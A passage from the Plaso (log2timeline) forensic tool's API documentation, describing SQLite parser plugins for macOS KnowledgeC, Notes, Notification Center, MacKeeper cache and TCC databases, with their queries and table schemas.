Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR UNIQUE, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_10EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_10EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}, {'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCUSTOMIDENTIFIER VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZCOUNT FLOAT, ZSTRINGVALUE VARCHAR )', 'ZKEYVALUE': 'CREATE TABLE ZKEYVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDOMAIN VARCHAR, ZKEY VARCHAR, ZVALUE BLOB )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z9_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZSUBJECT INTEGER, Z9_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZLOCALCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISELIGIBLEFORPREDICTION INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKDIGITALHEALTHMETADATAKEY__USAGETYPE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKINTENTMETADATAKEY__INTENTTYPE INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__CONTENTDESCRIPTION VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__SUGGESTEDINVOCATIONPHRASE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBDOMAIN VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__BUNDLEID VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__IDENTIFIER VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKRELEVANTSHORTCUTMETADATAKEY__KEYIMAGEPROXYIDENTIFIER VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSOURCEDEVICEID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSTREAMNAME VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBPAGEURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_DKRELEVANTSHORTCUTMETADATAKEY__SERIALIZEDRELEVANTSHORTCUT BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'ZSYNCPEER': 'CREATE TABLE ZSYNCPEER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCLOUDID VARCHAR, ZDEVICEID VARCHAR, ZRAPPORTID VARCHAR, ZUUID BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_11EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_11EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}] Plaso (log2timeline), Release 20210606 class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventData Bases: plaso.containers.events.EventData MacOS Duet / KnowledgeC database event data for Safari. bundle_identifier bundle identifier of the application. Type str duration duration of the activity. Type int title title of the webpage visited. Type str url URL visited. Type str DATA_TYPE = 'mac:knowledgec:safari' plaso.parsers.sqlite_plugins.mac_notes module

SQLite parser plugin for MacOS Notes database files. class plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventData Bases: plaso.containers.events.EventData Mac Notes event data. text note text. Type str title note title. Type str DATA_TYPE = 'mac:notes:note' class plaso.parsers.sqlite_plugins.mac_notes.MacNotesPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS notes database files. The MacOS Notes database file is typically stored in: test_data/NotesV7.storedata DATA_FORMAT = 'MacOS Notes SQLite database (NotesV7.storedata) file' NAME = 'mac_notes' ParseZHTMLSTRINGRow(parser_mediator, query, row, **unused_kwargs) Parses a row from the database. Parameters

286 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. QUERIES = [('SELECT ZNOTEBODY.ZHTMLSTRING AS zhtmlstring, ZNOTE.ZDATECREATED AS timestamp, ZNOTE.ZDATEEDITED AS last_modified_time, ZNOTE.ZTITLE as title FROM ZNOTEBODY, ZNOTE WHERE ZNOTEBODY.Z_PK = ZNOTE.Z_PK', 'ParseZHTMLSTRINGRow')] REQUIRED_STRUCTURE = {'ZNOTE': frozenset({'ZDATECREATED', 'ZDATEEDITED', 'ZTITLE'}), 'ZNOTEBODY': frozenset({'ZHTMLSTRING'})} SCHEMAS = [{'ZACCOUNT': 'CREATE TABLE ZACCOUNT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZALLOWINSECUREAUTHENTICATION INTEGER,ZDIDCHOOSETOMIGRATE INTEGER, ZENABLED INTEGER, ZROOTFOLDERINTEGER, Z6_ROOTFOLDER INTEGER, ZTRASHFOLDER INTEGER,ZGMAILCAPABILITIESSUPPORT INTEGER, ZPORT INTEGER,ZSECURITYLAYERTYPE INTEGER, ZMIGRATIONOFFERED INTEGER,ZACCOUNTDESCRIPTION VARCHAR, ZEMAILADDRESS VARCHAR, ZFULLNAMEVARCHAR, ZPARENTACACCOUNTIDENTIFIER VARCHAR, ZUSERNAME VARCHAR,ZFOLDERHIERARCHYSYNCSTATE VARCHAR, ZAUTHENTICATION VARCHAR,ZHOSTNAME VARCHAR, ZSERVERPATHPREFIX VARCHAR, ZEXTERNALURL BLOB,ZINTERNALURL BLOB, ZLASTUSEDAUTODISCOVERURL BLOB,ZTLSCERTIFICATE BLOB )', 'ZATTACHMENT': 'CREATE TABLE ZATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZCONTENTID VARCHAR, ZFILEURL BLOB )', 'ZFOLDER': 'CREATE TABLE ZFOLDER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZACCOUNT INTEGER, Z1_ACCOUNT INTEGER, ZPARENTINTEGER, Z6_PARENT INTEGER, ZISDISTINGUISHED INTEGER,ZALLEGEDHIGHESTMODIFICATIONSEQUENCE INTEGER,ZCOMPUTEDHIGHESTMODIFICATIONSEQUENCE INTEGER, ZUIDNEXT INTEGER,ZUIDVALIDITY INTEGER, ZTRASHACCOUNT INTEGER, Z1_TRASHACCOUNTINTEGER, ZNAME VARCHAR, ZCHANGEKEY VARCHAR, ZFOLDERID VARCHAR,ZSYNCSTATE VARCHAR, ZSERVERNAME VARCHAR )', 'ZNOTE': 'CREATE TABLE ZNOTE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZBODY INTEGER, ZFOLDER INTEGER, Z6_FOLDERINTEGER, ZMIMEDATASIZE INTEGER, ZDATECREATED TIMESTAMP,ZDATEEDITED TIMESTAMP, ZREMOTEID VARCHAR, ZTITLE VARCHAR,ZCHANGEKEY VARCHAR, ZUNIVERSALLYUNIQUEID BLOB )', 'ZNOTEBODY': 'CREATE TABLE ZNOTEBODY ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZHTMLSTRING VARCHAR )', 'ZOFFLINEACTION': 'CREATE TABLE ZOFFLINEACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZACCOUNTINTEGER, Z1_ACCOUNT INTEGER, ZFOLDER INTEGER, Z6_FOLDER INTEGER,ZPARENT INTEGER, Z6_PARENT INTEGER, ZORIGINALPARENT INTEGER,Z6_ORIGINALPARENT INTEGER, ZFOLDER1 INTEGER, Z6_FOLDER1 INTEGER,ZNOTE INTEGER, Z10_NOTE INTEGER, ZORIGINALFOLDER INTEGER,Z6_ORIGINALFOLDER INTEGER )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUIDVARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAMEVARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]

5.1. Subpackages 287 Plaso (log2timeline), Release 20210606

plaso.parsers.sqlite_plugins.mac_notificationcenter module

SQLite parser plugin for MacOS Notification Center database files. class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData Bases: plaso.containers.events.EventData MacOS NotificationCenter event data. body body of the notification message. Type str bundle_name name of the application’s bundle that generated the notification. Type str presented either 1 or 0 if the notification has been shown to the user. Type int subtitle optional. Subtitle of the notification message. Type str title title of the message. Usually the name of the application that generated the notification. Occasionally the name of the sender of the notification for example, in case of chat messages. Type str DATA_TYPE = 'mac:notificationcenter:db' class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS Notification Center database files. The MacOS Notification Center database file is typically stored in: /private/var/folders//../0/com.apple.notificationcenter/db2/db At the moment it takes into consideration only the main table, ‘record’. Currently supported tables and related content: Record: contains historical records Requests: contain pending requests Delivered: delivered requests Displayed: displayed requests, by app_id Snoozed: snoozed by user requests DATA_FORMAT = 'MacOS Notification Center SQLite database file' NAME = 'mac_notificationcenter' ParseNotificationcenterRow(parser_mediator, query, row, **unused_kwargs) Parses a message row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row.

288 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

QUERIES = [('SELECT a.identifier AS bundle_name, r.data AS dataBlob, r.delivered_date AS timestamp,r.presented AS presented FROM app a, record r WHERE a.app_id = r.app_id', 'ParseNotificationcenterRow')] REQUIRED_STRUCTURE = {'app': frozenset({'app_id', 'identifier'}), 'record': frozenset({'app_id', 'data', 'delivered_date', 'presented'})} SCHEMAS = [{'app': 'CREATE TABLE app (app_id INTEGER PRIMARY KEY, identifier VARCHAR)', 'dbinfo': 'CREATE TABLE dbinfo (key VARCHAR, value VARCHAR)', 'delivered': 'CREATE TABLE delivered (app_id INTEGER PRIMARY KEY, list BLOB)', 'displayed': 'CREATE TABLE displayed (app_id INTEGER PRIMARY KEY, list BLOB)', 'record': 'CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app_id INTEGER, uuid BLOB, data BLOB, request_date REAL, request_last_date REAL, delivered_date REAL, presented Bool, style INTEGER, snooze_fire_date REAL)', 'requests': 'CREATE TABLE requests (app_id INTEGER PRIMARY KEY, list BLOB)', 'snoozed': 'CREATE TABLE snoozed (app_id INTEGER PRIMARY KEY, list BLOB)'}] plaso.parsers.sqlite_plugins.mackeeper_cache module

SQLite parser plugin for MacOS MacKeeper cache database files. class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData Bases: plaso.containers.events.EventData MacKeeper Cache event data. description description. Type str event_type event type. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str record_id record identifier. Type int room room. Type str text text. Type str

5.1. Subpackages 289 Plaso (log2timeline), Release 20210606

url URL. Type str user_name user name. Type str user_sid user security identifier (SID). Type str DATA_TYPE = 'mackeeper:cache' class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS MacKeeper cache database files. DATA_FORMAT = 'MacOS MacKeeper cache SQLite database file' NAME = 'mackeeper_cache' ParseReceiverData(parser_mediator, query, row, **unused_kwargs) Parses a single row from the receiver and cache response table. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT d.entry_ID AS id, d.receiver_data AS data, r.request_key, r.time_stamp AS time_string FROM cfurl_cache_receiver_data d, cfurl_cache_response r WHERE r.entry_ID = d.entry_ID', 'ParseReceiverData')] REQUIRED_STRUCTURE = {'cfurl_cache_blob_data': frozenset({}), 'cfurl_cache_receiver_data': frozenset({'entry_ID', 'receiver_data'}), 'cfurl_cache_response': frozenset({'entry_ID', 'request_key', 'time_stamp'})} SCHEMAS = [{'cfurl_cache_blob_data': 'CREATE TABLE cfurl_cache_blob_data(entry_ID INTEGER PRIMARY KEY, response_object BLOB, request_object BLOB, proto_props BLOB, user_info BLOB)', 'cfurl_cache_receiver_data': 'CREATE TABLE cfurl_cache_receiver_data(entry_ID INTEGER PRIMARY KEY, receiver_data BLOB)', 'cfurl_cache_response': 'CREATE TABLE cfurl_cache_response(entry_ID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, version INTEGER, hash_value INTEGER, storage_policy INTEGER, request_key TEXT UNIQUE, time_stamp NOT NULL DEFAULT CURRENT_TIMESTAMP, partition TEXT)', 'cfurl_cache_schema_version': 'CREATE TABLE cfurl_cache_schema_version(schema_version INTEGER)'}]

290 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.macos_tcc module

SQLite parser plugin for MacOS TCC database files. class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry Bases: plaso.containers.events.EventData macOS TCC event data. allowed whether access to the service was allowed. Type bool client name of the client requesting access to the service. Type str prompt_count number of times an appplication prompted the user for access to a service. Type int query SQL query that was used to obtain the event data. Type str service name of the service. Type str DATA_TYPE = 'macos:tcc_entry' class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for MacOS TCC database files. The MacOS Transaprency, Consent, Control (TCC) database file is typically stored in: /Library/Application Support/com.apple.TCC/TCC.db /Users//Library/Application Support/com.apple.TCC/TCC.db DATA_FORMAT = 'MacOS Transaprency, Consent, Control (TCC) SQLite database (TCC.db) file' NAME = 'macostcc' ParseTCCEntry(parser_mediator, query, row, **unused_kwargs) Parses an application usage row. Parameters • parser_mediator (ParserMediator) – mediates 